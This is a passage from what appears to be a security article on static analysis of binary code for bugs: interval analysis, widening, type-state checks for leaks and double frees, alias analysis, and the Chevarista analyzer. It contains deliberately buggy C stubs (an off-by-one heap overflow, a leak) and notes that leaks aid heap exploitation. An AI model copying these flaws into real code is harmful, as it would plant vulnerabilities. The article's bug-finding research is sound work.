would take too much time to compute and/or too much memory for the
values graph to be mapped entirely.

By using certain abstractions like intervals, we can represent the set
of all possible values of a variable at a certain point of the program.
We will illustrate this with an example right now. The example itself is
meaningless, but the interesting point is to understand the mechanized
way of deducing information using the dataflow information of the
program.

We need to start with a very introductory example, which consists of
a potential division by zero:

Stub 4					Interval analysis of stub 4
-------					---------------------------

int  a, b;	

b = 0;					b = [0 to 0]
if (rand())		 
 b--;					b = [-1 to -1]
else
 b++;					b = [1 to 1]

					After if/else:

					b = [-1 to 1]

a = 1000000 / b;			a = [1000000 / -1 to 1000000 / 1] 
					    [Reported Error: b can be 0]

In this example, a flow-insensitive analyzer will merge the intervals of values
at each control flow merge point of the program. This is a seductive approach, as
a single pass over the whole program suffices to compute all intervals. However,
this approach is too imprecise most of the time. Why ? In this simple example, the
flow-insensitive analyzer will report a potential division by 0, whereas b can
never actually be 0 at the division program point. It is because 0 lies in the
interval [-1 to 1] that this false positive is reported by the analyzer. How can
we avoid this kind of over-conservative analysis ?

We need to introduce some flow-sensitiveness into the analysis, and differentiate
the intervals along the different paths of the program. If we do a complete
flow-sensitive analysis of this example, we have:

Stub 4					Interval analysis of stub 4
-------					---------------------------

int  a, b;	

b = 0;					b = [0 to 0]
if (rand())		 
 b--;					b = [-1 to -1]
else
 b++;					b = [1 to 1]

					After if/else:

					b = [-1 to -1 OR 1 to 1]

a = 1000000 / b;			a = [1000000 / -1 to 1000000 / -1] or 
					    [1000000 /  1 to 1000000 /  1] 
					  = {-1000000 or 1000000}

Then the false positive disappears. We should nevertheless avoid being flow-sensitive
from the beginning. Indeed, if the flow-insensitive analysis reports no bug, then no
bug will be reported by the flow-sensitive analysis either (at least for this example).
Additionally, the complete flow-sensitive sets of intervals at some program point
grow exponentially in the number of dataflow merge points (that is, Phi() functions
of the SSA form).
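
To make the merge concrete, here is a minimal sketch of such an
interval domain (an assumed representation, not chevarista's actual
one): the join at a merge point takes the smallest interval containing
both inputs, and a division is flagged whenever 0 lies in the
divisor's interval:

```c
#include <assert.h>

/* Minimal interval domain sketch: a set of values is abstracted
 * by its lower and upper bounds [lo, hi]. */
struct itv { long lo, hi; };

/* Flow-insensitive join at a control-flow merge: the smallest
 * interval containing both inputs.  Precision is lost here:
 * joining [-1,-1] and [1,1] yields [-1,1], which contains 0. */
static struct itv itv_join(struct itv a, struct itv b)
{
    struct itv r;
    r.lo = a.lo < b.lo ? a.lo : b.lo;
    r.hi = a.hi > b.hi ? a.hi : b.hi;
    return r;
}

/* A division is reported when 0 is a possible divisor value. */
static int itv_div_may_fault(struct itv divisor)
{
    return divisor.lo <= 0 && divisor.hi >= 0;
}
```

On Stub 4, the join of the two branch intervals contains 0, so the
flow-insensitive analyzer reports the (false positive) division by
zero, exactly as described above.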

For this reason, the best approach seems to be to start completely flow-insensitive,
and refine the analysis on demand. If the program is transformed into SSI form, then
it becomes pretty easy to know which source intervals we need to use to compute the
interval of values of a destination variable. We will use the same kind of analysis
for detecting buffer overflows; in that case the interval analysis will be used on
the index variables that are used for accessing memory at a certain offset from a
given base address.

Before doing this, we should make a remark about the choice of the interval
abstraction itself. This abstraction does not work well when bit swapping is involved
in the operations. Indeed, the intervals will generally have meaningless values when
bits are moved around inside the variable. If a cryptographic operation used a bit
shift that introduces 0s to replace shifted bits, that would not be a problem, but
swapping bits inside a given word is a problem, since the output interval is then
meaningless.

        c = a | b		(with a, b, and c integers)
	c = a ^ b
	c = not(c)

Given the intervals of a and b, what can we deduce for the interval of c ? It is
less trivial than a simple numerical change in the variable. Interval analysis is
not very well adapted to analyzing this kind of code, mostly found in cryptographic
routines.

We will now analyze an example that involves a buffer overflow on the heap. Before
doing the interval analysis, we will do a first pass to collect the statements
related to memory allocation and deallocation. Knowing where memory is allocated
and deallocated is a prerequisite for any further bound-checking analysis.

Stub 5					Interval analysis with alloc annotations
------					----------------------------------------

char *buf;				buf = _|_ (uninitialized)
int   n = rand();			n   = [-Inf, +Inf]
buf = malloc(n)				buf = initialized of size [-Inf to Inf]
i   = 0;				i   = [0,0], [0,1] ... [0,N]

while (i <= n)				      
  assert(i < N)			    
  buf[i] = 0x00;			
  i++;					i   = [0,1], [0,2] ... [0,N]
					     (iter1  iter2 ... iterN)
return (i);

Let's first explain that the assert() is a logical representation in the intermediate
form, and is not an assert() as in a C program. Again, we never do any dynamic
analysis, only static analysis without any execution. During the static analysis of
the intermediate form program, at some point the control flow will reach a node
containing the assert statement. In the intermediate (abstract) world, reaching an
assert() means performing a check on the abstract value of the predicate inside the
assert (i < N). In other words, the analyzer will check if the assert can be false
using interval analysis of variables, and will print a bug report if it can. We could
also leave the assert() implicit, but representing it explicitly makes the analysis
more generic, modular, and adaptable to the user.

As you can see, there is a one-byte overflow in this example. It is pretty trivial
to spot manually; however, we want to develop an automatic routine for doing
it. If we deploy the analysis that we did in the previous example, the assert()
that was automatically inserted by the analyzer after each memory access of the
program will fail after N iterations. This is because arrays in the C language start
at index 0 and end at an index one less than their allocated size. Whatever kind of
code is inserted between those lines (except, of course, bit swapping as
previously mentioned), we will always be able to propagate the intervals and find
that a memory access is done beyond the allocated limit, thus finding a clear
information leak or memory overwrite vulnerability in the program.

However, this specific example brings 2 more questions:

	- We do not know the actual value of N. Is it a problem ? If we
	manage to see that the constraint over the index of buf actually
	involves the same variable (or one with the same value) as the size
	of the allocated buffer, then it is not a problem. We will develop
	this in the alias analysis part of this article.

	- Whatever the value of N, and provided we managed to identify
	all definitions and uses of the variable N, the analyzer will require
	N iterations over the loop to detect the vulnerability. This is not
	acceptable, especially if N is very big, in which case many
	minutes would be necessary for analysing this loop, when we actually
	want an answer within seconds.

The answer to this optimization problem is a technique called widening, borrowed
from the theory of abstract interpretation. Instead of executing the loop N
times until the loop condition is false, we will go directly, in one iteration, to
the last possible value in a certain interval, as soon as we detect a
monotonic increase of the interval. The previous example would then compute
as follows:

Stub 5					Interval analysis with Widening
------					-------------------------------

char *buf;				buf = _|_ (uninitialized)
int   n = rand();			n   = [-Inf, +Inf]
buf = malloc(n)				buf = initialized of size [-Inf to Inf]
i   = 0;				i = [0,0]

while (i <= n)
  assert(i < N); 			    iter1  iter2 iter3 iter4  ASSERT!
  buf[i] = 0x00;			i = [0,0], [0,1] [0,2] [0,N] 	
  i++;					i = [0,1], [0,2] [0,3] [0,N] 
return (i);

Using this technique, we can reach the biggest possible interval in only
a few iterations, thus drastically reducing the time required for finding
the vulnerability. However, this optimization might introduce additional
difficulties when a conditional statement stands inside the loop:

Stub 6					Interval analysis with Widening
------					-------------------------------

char *buf;				buf = _|_ (uninitialized)
int   n = rand() + 2;			n   = [-Inf, +Inf]
buf = malloc(n)				buf = initialized of size [-Inf to Inf]
i   = 0;				i = [0,0]

while (i <= n)				i = [0,0] [0,1] [0,2] [0,N] [0,N+1]
  if (i < n - 2)		        i = <same as previously for all iterations>
    assert(i < N - 1)			[Never triggered !]
    buf[i] = 0x00;  			i = [0,0] [0,1] [0,2] [0,N] <False positive>    
  i++;					i = [0,1] [0,2] [0,3] [0,N] [0,N+1]	
return (i);

In this example, we cannot assume that the interval of i will be the same everywhere
in the loop (as we might be tempted to as a first attempt at handling intervals in
a loop). Indeed, in the middle of the loop stands a condition (with predicate
i < n - 2) which forbids the interval to grow in some part of the code. This is
problematic, especially if we decide to use widening until the loop-breaking
condition: we would miss this more subtle repartition of values in the variables of
the loop. The solution is to use widening with thresholds. Instead of applying
widening in a single step over the entire loop, we define a sequence of values which
correspond to "strategic points" of the code, so that we can increase the intervals
precisely using small-step value iterations.

The strategic points can be the list of values on which a condition is applied. In
our case we would apply widening until i = n - 2 and not until i = n. This way, we
no longer trigger a false positive because of an over-approximation of the intervals
over the entire loop. Each realized step also lets us annotate which program
locations are subject to widening in the future (in our case: the loop code before
and after the "if" statement).

Note that, when we reach a threshold during widening, we might need to apply a
small-step iteration more than once before widening again until the next threshold.
For instance, when predicates such as (a != immed_value) are met, they forbid the
inner code of the condition to have its intervals propagated. However, they forbid
this for just one iteration (if a is an inductive variable, so its state changes at
the next iteration) or for multiple iterations (if a is not an inductive variable
and is modified only at another moment of the loop's iterative abstract execution).
In the first case, we need only 2 small-step abstract iterations to find out that
the interval continues to grow after a certain iteration. In the second case, we
need multiple iterations until some condition inside the loop is reached. We then
simply need to make sure that the threshold list includes the variable value used
at this predicate (which heads the code where the variable a will change). This
way, we can apply only 2 small-step iterations between those "bounded widening"
steps, and avoid generating false positives, using a very optimized but precise
abstract evaluation sequence.
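
A possible sketch of this bounded widening (names and encoding are
hypothetical): the upper bound of a growing interval jumps to the next
threshold taken from the loop predicates, instead of increasing one
step at a time:

```c
#include <assert.h>

/* Widening with thresholds, sketched: thr[] is the sorted list of
 * "strategic" values collected from the loop predicates (e.g. n - 2
 * and n).  When the upper bound keeps growing, jump directly to the
 * next threshold; when no threshold is left, go to the maximum. */
static long widen_hi(long prev_hi, long new_hi,
                     const long *thr, int nthr, long top)
{
    if (new_hi <= prev_hi)          /* interval not growing: keep it */
        return new_hi;
    for (int i = 0; i < nthr; i++)  /* next threshold above new_hi */
        if (thr[i] >= new_hi)
            return thr[i];
    return top;                     /* widen to the loop bound */
}
```

With thresholds {n - 2, n}, the index of Stub 6 is first widened to
n - 2, small-stepped through the condition, then widened to n, which
avoids the false positive on the guarded access.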

In our example, we considered only an easy case: the threshold list is made of just
2 elements (n and (n - 2)). But what if a condition involves 2 variables, and not a
variable and an immediate value ? In that case we have 3 cases:

CASE1 - The 2 variables are inductive variables: in that case, the threshold lists
of the two variables must be fused, so that widening does not step over a condition
that would make it lose precision. This seems to be a reasonable condition when one
variable is the subject of a constraint that involves a constant, and the second
variable is the subject of a constraint that involves the first variable:

Stub 7:						Threshold discovery
-------						-------------------

int i = 0;
int n = MAXSIZE;

while (i < n)					Found threshold n
  if (a < i < b)				Found predicate involving a and b
  if (a > sizeof(something))			Found threshold for a
    i = b;
  else if (b + 1 < sizeof(buffer))		Found threshold for b
    i = a;

In that case, we can define the threshold list of this loop as being made of 2
values, one being sizeof(something), the other being sizeof(buffer), or
sizeof(buffer) - 1 if the analyzer is a bit more clever (and if the assembly code
makes it clear that the condition applies to sizeof(buffer) - 1).

CASE2 - One of the variables is inductive and the other one is not.

Here we have 2 subcases:

 - The inductive variable is involved in a predicate that leads to modification
   of the non-inductive variable. This is not possible without the 2 variables
   both being inductive ! Thus we fall into case 1 again.

 - The non-inductive variable is involved in a predicate that leads to
   modification of the inductive variable. In that case, the non-inductive
   variable is invariant over the loop, which means that a test between
   its domain of values (its interval) and the domain of the inductive
   variable is required as a condition to enter the code stubs headed by the
   analyzed predicate. Again, we have 2 sub-subcases:

	* Either the predicate is a test == or !=. In that case, we must compute
	the intersection of both variables' intervals. If the intersection is void,
	the test will never be true, so it is dead code. If the intersection is
	itself an interval (which will be the case most of the time), it means that
	the test will be true over this interval of values of the inductive
	variable, and false over the remaining domain of values. In that case, we
	need to put the bounds of the non-inductive variable's interval into the
	threshold list for the widening of the inductive variables that depend on
	this non-inductive variable.

	* Or the predicate is a comparison : a < b (where a or b is an inductive
	variable). The same remarks hold : we compute the intersection interval
	between a and b. If it is void, the test will always be true or false, and
	we know this before entering the loop. If the interval is not void, we
	need to put the bounds of the intersection interval into the widening
	thresholds of the inductive variable.
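
The intersection test used in both sub-subcases can be sketched as
follows (a minimal standalone helper with hypothetical names):

```c
#include <assert.h>

/* Interval intersection sketch: a void intersection means the
 * predicate has a constant truth value over the loop (dead code or
 * always-taken branch); otherwise its bounds feed the widening
 * threshold list of the inductive variable. */
struct range { long lo, hi; };

static int range_intersect(struct range a, struct range b,
                           struct range *out)
{
    long lo = a.lo > b.lo ? a.lo : b.lo;
    long hi = a.hi < b.hi ? a.hi : b.hi;
    if (lo > hi)
        return 0;                   /* void intersection */
    out->lo = lo;
    out->hi = hi;
    return 1;
}
```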

CASE3 - None of the variables is inductive.

In that case, the predicate they define has a single truth value over the
entire loop, and can be computed before the loop takes place. We can then
turn the conditional code into unconditional code and apply widening
as if the condition did not exist. Or, if the condition is always
false, we simply remove this code from the loop, as the content of
the conditional statement will never be reached.

As you can see, we need to be very careful in how we perform the widening. If
the widening is done without thresholds, the abstract numerical values will
be over-approximated, and our analysis will generate a lot of false positives.
By introducing thresholds, we sacrifice very little performance and gain a lot of
precision in the analysis of looping code. Widening is a convergence accelerator
for detecting problems like buffer overflows. Some overflow problems only happen
after millions of loop iterations, and widening brings a nice solution for
getting immediate answers even on those constructs.

I have not detailed how to find the size of buffers in this paragraph. Whether
the buffers are stack- or heap-allocated, they need to have a fixed size at
some point, and the stack pointer must be subtracted somewhere (or malloc
needs to be called, etc), which gives us the allocation information
together with its size, from which we can apply our analysis.

We will now switch to the last big part of this article, by explaining how
to check for another class of vulnerabilities.

------------[ B. Type state checking (aka double free, memory leaks, etc)

There are some other types of vulnerabilities that are slightly different to
check for. In the previous part we explained how to reason about intervals of
values to find buffer overflows in programs. We presented an optimization
technique called widening and we studied how to weaken it to gain
precision, by generating a threshold list from a set of predicates. Note that
we haven't explicitly used what is called "predicate abstraction", which
could improve the efficiency of the analysis further. The interested
reader will easily find resources about predicate abstraction on any good
research-oriented search engine. Again, this article is not intended to give
solutions to all the problems of the world, but to introduce the novice hacker
to the concrete problems of program analysis.

In this part of the article, we will study how to detect memory leaks and
heap corruptions. The basic technique to find them is not linked with interval
analysis, but interval analysis can be used to make type state checking more
accurate (reducing the number of false positives). 

Let's take a concrete example of a memory leak:

Stub 8:

1. u_int off  = 0;
2. u_int ret  = MAXBUF;
3. char  *buf = malloc(ret);

4. do {
5.     off += read(sock, buf + off, ret - off);
6.     if (off == 0)
7.       return (-ERR);
8.     else if (ret == off)
9.       buf = realloc(buf, ret * 2);
10.} while (ret);

11. printf("Received %s \n", buf);
12. free(buf);
13. return;

In that case, there is no overflow, but if a certain condition arises after the
read, an error is returned without freeing the buffer. This is not a vulnerability
as such, but it can help a lot in managing the memory layout of the heap while
trying to exploit a heap overflow vulnerability. Thus, we are also interested in
detecting memory leaks, which can turn some particular exploits into powerful
weapons.

Using the graphical representation of control flow and data flow, we can easily
find out that the code is wrong:

Graph analysis of Stub 8

	o A				A: Allocation
        |     \  
        o      \
       / \      \
      /   \      \			R: Return
   R o     o REA /			REA: Realloc
      \   /     /
       \ /     /
        o     /
        |    /
        |   /
        |  /
        | /
        |				F: Free
      F o
      R o				R: Return

Note that this representation is not a dataflow graph, but a
control-flow graph annotated with data allocation information for
the BUF variable. This allows us to reason about existing control
paths and sequences of memory-related events. Another way of doing
this would have been to reason about data dependences together with
the predicates, as done in the first part of this article with the
Labelled SSI form. We are not dogmatic towards one or another
intermediate form, and the reader is invited to ponder by himself
which representation fits his understanding better. I invite
you to think twice about the SSI form, which is really a condensed
view of lots of different information. For pedagogical purposes, we
switch here to a more intuitive intermediate form that expresses a
similar class of problems.

Stub 8:

0. #define PACKET_HEADER_SIZE 20

1. int   off  = 0;
2. u_int ret  = 10;
3. char  *buf = malloc(ret);				M

4. do {
5.     off += read(sock, buf + off, ret - off);
6.     if (off <= 0)
7.       return (-ERR);					R
8.     else if (ret == off)
9.       buf = realloc(buf, (ret = ret * 2));		REA
10.} while (off != PACKET_HEADER_SIZE);

11. printf("Received %s \n", buf);
12. free(buf);						F
13. return;						R

Using a simple DFS (Depth-First Search) over the graph representing Stub 8,
we can extract sequences like:

1,2,(3 M),4,5,6,8,10,11,(12 F),(13 R)		M...F...R	-noleak-

1,2,(3 M),4,(5,6,8,10)*,11,(12 F),(13 R)	M(...)*F...R	-noleak-

1,2,(3 M),4,5,6,8,10,5,6,(7 R)			M...R		-leak-

1,2,(3 M),(4,5,6,8,10)*,5,6,(7 R)		M(...)*R	-leak-

1,2,(3 M),4,5,6,8,(9 REA),10,5,6,(7 R)		M...REA...R	-leak-

1,2,(3 M),4,5,6,(7 R)				M...R		-leak-


More generally, we can represent the set of all possible traces for
this example :

		1,2,3,(5,6,(7 | 8(9 | Nop)) 10)*,(11,12,13)*

with | meaning choice and * meaning potential looping over the events
placed between (). As the program might loop more than once or twice,
a lot of different traces are potentially vulnerable to the memory leak
(not only the few we have given), but all can be expressed using this
global generic regular expression over the events of the loop. We now
match them against this regular expression:

		VulnTraces = .*(M)[^F]*(R)

that represents traces containing a malloc followed by a return without
an intermediate free, which corresponds in our program to:

		VulnTraces = .*(3).*(7)	 # because 12 is not between 3 and 7 in any cycle

In other words, if we can extract a trace that leads to a return after passing
through an allocation not followed by a free (with an undetermined number of states
between those 2 steps), we have found a memory leak bug.

We can then compute the intersection of the global regular expression of traces
and the vulnerable-traces regular expression to extract all potential
vulnerable paths from a language of traces. In practice, we will not generate
all vulnerable traces but simply emit a few of them, until we find one that
we can indeed trigger.

Clearly, the first two traces have a void intersection with it (they don't
contain 7). So those traces are not vulnerable. However, the next trace expressions
match the pattern, and thus are potentially vulnerable paths for this vulnerability.
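
The whole detection can be sketched as a DFS over an event-annotated
control-flow graph (the encoding below is hypothetical and kept
deliberately tiny): a path reaching a return while an allocation is
pending, with no free in between, is reported as a leak:

```c
#include <assert.h>
#include <string.h>

#define MAXNODE 16
#define MAXSUCC 2

static int  nsucc[MAXNODE];
static int  succ[MAXNODE][MAXSUCC];
static char event[MAXNODE];         /* 'M'alloc, 'F'ree, 'R'eturn, or 0 */
static int  leak_found;

/* DFS carrying the abstract state "allocated": matching the pattern
 * M [^F]* R along any path flags a leak.  The depth bound is a crude
 * way to cut cycles in this sketch. */
static void dfs(int node, int allocated, int depth)
{
    if (depth > MAXNODE)
        return;
    if (event[node] == 'M') allocated = 1;
    if (event[node] == 'F') allocated = 0;
    if (event[node] == 'R' && allocated) { leak_found = 1; return; }
    for (int i = 0; i < nsucc[node]; i++)
        dfs(succ[node][i], allocated, depth + 1);
}
```

On a graph shaped like Stub 8 (malloc, a branch to an early error
return, and the normal free-then-return path), the DFS finds the
M...R path that skips the free.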

We could use the exact same system for detecting double frees, except that
our trace pattern would be :

		VulnTraces = .*(F)[^M]*(F)

that is : a free followed by a second free on the same dataflow, without passing
through an allocation between the two. A simple trace-based analyzer can detect
many classes of vulnerabilities using a single engine ! That superclass of
vulnerabilities is made of so-called type-state vulnerabilities, following the idea
that even if the type of a variable does not change during the program, its state
does, so the standard type-checking approach is not sufficient to detect this kind
of bugs.

As the careful reader might have noticed, this algorithm does not take predicates
into account, which means that if such a vulnerable trace is emitted, we have no
guarantee that the real conditions of the program will ever execute it. Indeed, we
might extract a path of the program that "crosses" multiple predicates, some
being incompatible with others, thus generating infeasible paths with our
analysis.

For example, in our Stub 8 translated to assembly code, a predicate-insensitive
analysis might generate the trace:

		1,2,(3 M),4,5,6,8,(9 REA),10,11,(12 F),(13 R)

which is impossible to execute, because the predicates holding at states 8 and 10
cannot be respectively true and false after just one iteration of the loop. Thus
such a trace cannot exist in the real world.

We will not go further into this topic in this article, but in the next part we
will discuss various improvements to what should be a good analysis engine, to
avoid generating too many false positives.

------------[ C. How to improve

	In this part, we will quickly review various methods to determine how
it is possible to make the analysis more accurate and efficient. Current researchers
in program analysis call this "counter-example guided" verification. Various
techniques taken from the worlds of model checking or abstract interpretation can
be used there, but we will not enter such theoretical concerns. We will simply
discuss the ideas behind those techniques without entering the details. The
chevarista analyzer proposed in the appendix of this article only performs basic
alias analysis, no predicate analysis, and no thread scheduling analysis (as would
be useful for detecting race conditions). I will give the names of a few analyzers
that implement these analyses and mention which techniques they use.

----------------------[ a. Predicate analysis and the predicate lattice

Predicate abstraction [PA] is about collecting all the predicates in a program, and
constructing from this list a mathematical object called a lattice [LAT]. A lattice
is a set of objects on which a certain (partial) order is defined between the
elements of the set. A lattice has various theoretical properties that make it
different from a plain partial order, but we will not give such details in this
article. We will discuss the order itself and the type of objects we are talking
about:

	- The order can be defined as inclusion between objects

				(P < Q iff P is included in Q)

	- The objects can be predicates

	- The conjunction (AND) of predicates can be the least upper bound of N
	predicates. Predicates (a > 42) and (b < 2) have as upper bound:

				(a > 42) && (b < 2)

	- The disjunction (OR) of predicates can be the greatest lower bound of
	N predicates. Predicates (a > 42) and (b < 2) have as lower bound:

				(a > 42) || (b < 2)

	So the lattice would look like:

				(a > 42) && (b < 2)
					/  \
				       /    \
				      /      \
				(a > 42)     (b < 2)
				      \      /
                                       \    /
                                        \  /
	                        (a > 42) || (b < 2)

Now imagine we have a program with N predicates. If all predicates
can be true at the same time, the number of conjunctive combinations of predicates
will be 2 to the power of N. This is without counting the lattice elements
which are disjunctions of predicates. The total number of combinations
will then be 2*2^N - N : we have to subtract N because the predicates
made of a single atomic predicate are shared between the set of conjunctive
and the set of disjunctive predicates, which both have 2^N elements
including the atomic predicates, an atomic predicate being the base case for a
conjunction (pred && true) or a disjunction (pred || false).

We may also need to consider the other truth values of predicates : false, and
unknown. False would simply be the negation of a predicate, and unknown would
stand for a predicate whose truth value we cannot determine (either false or true,
but we don't know). In that case, the number of possible combinations of N
predicates, each of them being potentially true, false, or unknown, goes up to
3^N. This approach is called three-valued logic [TVLA].
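
The counts above can be checked mechanically for small N (a throwaway
sketch, nothing more):

```c
#include <assert.h>

/* Two-valued lattice elements: conjunctions (2^N) plus disjunctions
 * (2^N), minus the N atomic predicates counted twice. */
static long two_valued(int n)
{
    return 2 * (1L << n) - n;
}

/* Three-valued logic: each of the N predicates is true, false or
 * unknown, hence 3^N combinations. */
static long three_valued(int n)
{
    long r = 1;
    while (n-- > 0)
        r *= 3;
    return r;
}
```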

In other words, we have an exponential worst-case space complexity for constructing
the lattice of predicates that corresponds to an analyzed program. Very often, the
lattice will be smaller, as many predicates cannot be true at the same time. However,
there is a big limitation in such a lattice: it is not capable of representing
predicates that mix AND and OR. It means that if we analyze a program point that can
be reached under many different sets of predicates (say, by executing many different
possible paths, which is the case for reusable functions), this lattice will not be
capable of giving the most precise "full" abstract representation for it, as it may
introduce some flow-insensitivity into the analysis (e.g. a single predicate
combination will represent multiple different paths). Even though this might generate
false positives, it looks like a good trade-off between precision and complexity. Of
course, this lattice is just provided as an example, and the reader should feel free
to adapt it to his precise needs, depending on the size of the code to be verified.
It is a good hint for a given abstraction, but we will see that information other
than predicates is also important for program analysis.

---------------------[ b. Alias analysis is hard

	A problem that arises in source code but even more in binary code
automated auditing is alias analysis between pointers. When do two pointers
point to the same variable ? This is important in order to propagate the
inferred allocation size (when talking about a buffer), and to share a 
type-state (such as when a pointer is freed or allocated : you could miss 
double-free or double-something bugs if you do not know that 2 variables are 
actually the same).

There are multiple techniques to achieve alias analysis. Some of them work
inside a single function (so-called intraprocedural analysis [DDA]). Others
work across the boundaries of a function. Generally, the more precise your
alias analysis is, the smaller the programs you will be capable of analyzing.
It seems quite difficult to scale to millions of lines of code when tracking
every single location for all possible pointers in a naive way. In addition
to the problem that each variable might have a very big number of aliases
(especially when involving aliases over arrays), a program translated to
a single-assignment or single-information form has a very big number of
variables too. However, the live ranges of those variables are very limited,
so their number of aliases is too. It is necessary to define aliasing relations
between variables so that we can proceed with our analysis using some extra
checks:

	- no_alias(a,b)   : Pointers a and b definitely point to different sets
			   of variables

	- must_alias(a,b) : Pointers a and b definitely point to the same set
			   of variables

	- may_alias(a,b)  : The point-to sets of variables a and b share some
			    elements (non-empty intersection) but are not equal.
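Assuming each pointer comes with a (possibly approximate) point-to set, the
three relations reduce to set comparisons. A minimal sketch with hand-made
point-to sets (a real analysis would compute them):

```python
# Sketch: alias relations derived from point-to sets.

def no_alias(pts_a, pts_b):
    # definitely disjoint point-to sets
    return not (pts_a & pts_b)

def must_alias(pts_a, pts_b):
    # identical singleton point-to sets: always the same variable
    return pts_a == pts_b and len(pts_a) == 1

def may_alias(pts_a, pts_b):
    # overlapping point-to sets, but not provably always equal
    return bool(pts_a & pts_b) and not must_alias(pts_a, pts_b)

a = {"buf"}           # a definitely points to buf
b = {"buf", "tmp"}    # b points to buf on one path, tmp on another
c = {"len"}

print(no_alias(a, c))    # True
print(must_alias(a, a))  # True
print(may_alias(a, b))   # True
```

Note that must_alias requires a singleton set: two pointers that share the
same two-element point-to set may still designate different variables at
runtime, so they are only may-aliases.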

NoAliasing and MustAliasing are quite intuitive. The big job is definitely
MayAliasing. For instance, 2 pointers might point to the same variable
when executing some program path, but to different variables when executing
another path. An analysis that is capable of making these distinctions is
called a path-sensitive analysis. Also, for a single program location
manipulating a given variable, the point-to set of the variable can be
different depending on the context (for example : the set of predicates that
are true at this moment of abstract program interpretation). An analysis that
can reason about those differences is called context-sensitive.

It is an open research problem to find better alias analysis algorithms that
scale to big programs (i.e. have low computation cost) and that are capable of
keeping sufficient precision to prove security properties. Generally, you can
have one, but not the other. Some analyses are very precise but only work
within the boundaries of a function. Others work in a pure flow-insensitive
manner, and thus scale to big programs, but are very imprecise. My example
analyzer Chevarista implements only a simple alias analysis, which is very
precise but does not scale well to big programs. For each pointer, it will try
to compute its point-to set in the concrete world by somewhat simulating the
computation of pointer arithmetic and looking at its results from within the
analyzer. It is just provided as an example and is in no way a definitive
answer to this problem.

--------------------[ c. Hints on detecting race conditions

	Another class of vulnerability that we are interested in detecting
automatically is race conditions. These vulnerabilities require a different
analysis to be discovered, as they relate to a scheduling property : is
it possible that 2 threads get interleaved (a,b,a,b) executions over their
critical sections where they share some variables ? If the variables are
all properly locked, interleaved execution will not be a problem anyway. But
if locking is badly handled (as can happen in very big programs such
as operating systems), then a scheduling analysis might uncover the bug.

Which data structure can we use to perform such an analysis ? The approach
of JavaPathFinder [JPF], which is developed at NASA, is to use a scheduling
graph. The scheduling graph is an acyclic (loop-free) graph, where nodes
represent states of the program and edges represent scheduling
events that preempt the execution of one thread to execute another.

While this approach seems interesting for detecting any potential scheduling
path (using, again, a depth-first search over the scheduling graph) that
fails to properly lock a variable that is used in multiple different
threads, it seems more delicate to apply when we deal with
more than 2 threads. Each potential node will have as many edges as
there are threads, thus the scheduling graph will grow exponentially
at each scheduling step. We could use a technique called partial
order reduction to represent by a single node a big piece of code
for which all instructions share the same scheduling property (like:
it cannot be interrupted) or the same dataflow property (like: it uses
the same set of variables), thus reducing the scheduling graph to make
it more abstract.
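The growth described here is easy to quantify: the number of distinct
interleavings of T threads executing k atomic steps each is the multinomial
(T*k)! / (k!)^T. A quick sketch (illustration only):

```python
from math import factorial

def interleavings(threads, steps):
    # number of distinct schedules of `threads` threads,
    # each executing `steps` atomic instructions
    return factorial(threads * steps) // factorial(steps) ** threads

print(interleavings(2, 2))  # 6
print(interleavings(2, 4))  # 70
print(interleavings(3, 4))  # 34650
```

Partial order reduction effectively shrinks `steps` by merging
uninterruptible (or dataflow-equivalent) instruction sequences into single
nodes, which collapses this count dramatically.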

Again, the Chevarista analyzer does not deal with race conditions, but
other analyzers do, and techniques exist to make it possible. Consider
reading the references for more on this topic.

-----------[ IV. Chevarista: an analyzer of binary programs

   Chevarista is a project for analyzing binary code. In this article, most of
   the examples have been given in C or assembly, but Chevarista only analyzes
   the binary code, without any information from the source. All it
   needs is an entry point to start the analysis, which you can always get
   without trouble, for any (working ? ;) binary format like ELF, PE, etc.

   Chevarista is a simpler analyzer than everything that was presented in
   this article; however, it aims at following this model, driven by the
   successful results that were obtained using the current tool. In particular,
   the intermediate form of Chevarista at the moment is a graph that contains
   both data-flow and control-flow information, but with sigma and phi 
   functions left implicit.

   For simplicity, we have chosen to work on SPARC [SRM] binary code, but after
   reading this article, you might understand that the representations
   used are sufficiently abstract to be used on any architecture. One could
   argue that the SPARC instruction set is RISC, and that supporting
   architectures like INTEL (CISC) or ARM, where many instructions are
   conditional, would be a problem. You are right to object to this, because
   these architectures require specific features in the architecture-dependent
   backend of the decompiler-analyzer. Currently, only the SPARC backend is
   coded and there is an empty skeleton for the INTEL architecture [IRM].

   What, in detail, are the differences between such architectures ?

   They are essentially grouped into a single architecture-dependent component :
				The Backend

   On INTEL 32-bit processors, each instruction can perform multiple operations.
   It is also the case for SPARC, but only when conditional flags are affected 
   by the result of the operation executed by the instruction. For instance,
   a push instruction writes to memory, modifies the stack pointer, and
   potentially modifies the status flags (the eflags register on INTEL), which
   makes it very hard to analyze. Many instructions do more than a single
   operation, thus we need to translate them into intermediate forms that make
   those operations more explicit. If we limit the number of syntactic
   constructs in that intermediate form, we are capable of performing
   architecture-independent analysis much more easily, with all operations made
   explicit. The low-level intermediate form of Chevarista has around 10
   "abstract operations" in its IR : Branch, Call, Ternop (which has an
   additional field in the structure indicating which arithmetic or logic
   operation is performed), Cmp, Ret, Test, Interrupt, and Stop. Additionally
   you have purely abstract operations: FMI (Flag Modifying Instruction), CFI
   (Control Flow Instruction), and Invoke (external function calls), which
   allow making the analysis even more generic. Invoke is a kind of statement
   that informs the analyzer that it should not try to analyze inside the
   function being invoked, but consider its internals as an abstraction. For
   instance, the types Alloc, Free, and Close are child classes of the Invoke
   abstract class, which model the fact that malloc(), free(), or close() are
   called and the analyzer should not try to handle the called code, but
   consider it as a black box. Indeed, finding allocation bugs does not require
   analyzing inside malloc() or free(). This would be necessary for automated
   exploit generation though, but we do not cover this topic here.

   We make use of the Visitor Design Pattern for architecturing the analysis,
   as presented in the following paragraph.
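To illustrate the Invoke abstraction described above, here is a toy sketch.
The class names mirror the description (Invoke, Alloc, Free, Close), but the
code is our own illustration, not Chevarista's actual C++:

```python
# Sketch: Invoke statements model library calls as black boxes.

class Statement:
    """Base class of all IR statements."""

class Invoke(Statement):
    """External call: the analyzer models its effect, not its body."""

class Alloc(Invoke):
    """Models malloc(): introduces a fresh heap object."""

class Free(Invoke):
    """Models free(): kills the pointed-to heap object."""

class Close(Invoke):
    """Models close(): kills a file descriptor."""

def should_analyze_body(stmt):
    # the analyzer never descends into the target of an Invoke
    return not isinstance(stmt, Invoke)

print(should_analyze_body(Alloc()))      # False: treated as a black box
print(should_analyze_body(Statement()))  # True: ordinary statement
```

The point of the hierarchy is that a heap checker only needs to match on
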